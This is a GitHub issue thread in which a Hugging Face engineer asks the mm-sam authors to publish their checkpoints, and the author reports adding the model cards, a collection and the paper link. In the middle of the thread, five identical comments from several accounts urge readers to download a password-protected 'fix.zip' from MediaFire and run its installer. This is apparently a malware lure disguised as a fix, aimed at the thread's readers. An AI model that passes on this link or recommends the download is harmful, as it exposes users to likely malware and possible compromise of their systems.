### ISSUE TITLE
HF integration

### ISSUE THREAD

**Issue by NielsRogge** [weihao1115/mm-sam#2]
Hi,

Niels here from the open-source team at Hugging Face. Congrats on your work! I discovered your work through the paper page: https://huggingface.co/papers/2408.09085 (feel free to claim the paper so that it appears at your HF account!).

Would you be up for making the checkpoints available on 🤗 , tagging them with "pipeline_tag: mask-generation" in the model card so that people find them when searching https://huggingface.co/models?pipeline_tag=mask-generation&sort=trending? Refer to https://huggingface.co/docs/hub/models-uploading for details.

Do note that with a single line of code, a checkpoint can be downloaded from the hub, using the [hf_hub_download](https://huggingface.co/docs/huggingface_hub/v0.24.5/en/guides/download#download-a-single-file) method. In case you have a custom PyTorch model for which you want to add from_pretrained and push_to_hub capabilities, we recommend leveraging [PyTorchModelHubMixin](https://huggingface.co/docs/huggingface_hub/package_reference/mixins#huggingface_hub.PyTorchModelHubMixin).

Happy to assist!

Cheers,

Niels
ML Engineer @ HF 🤗

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by weihao1115** [comment]
Hi @NielsRogge ,

Thank you for reaching out and for your interest in our work! We are currently preparing and will release the code and checkpoints in a few days. We will then update a model card and the checkpoints on Hugging Face. We will update you on our progress.

Best regards,

**Comment by weihao1115** [comment]
Hi @NielsRogge ,

We have updated the model cards and a collection involving all our models at [here](https://huggingface.co/collections/weihao1115/mm-sam-66d47ef7cf97d88019d659cc) . Thank you.

Best regards,

**Comment by NielsRogge** [comment]
That's really great, thanks for doing that!

Would it also be possible to add a link to https://hf.co/papers/2408.09085 within the respective model cards? This way, all models will be visible from https://huggingface.co/papers/2408.09085.

Similarly, you can add a paper into a collection as well if you want :)

Cheers!

**Comment by weihao1115** [comment]
Hi @NielsRogge ,

Sorry for the late reply. I have added the paper to the collection and to the model cards. Thank you for your reminder and helpful guidance!

Best regards,
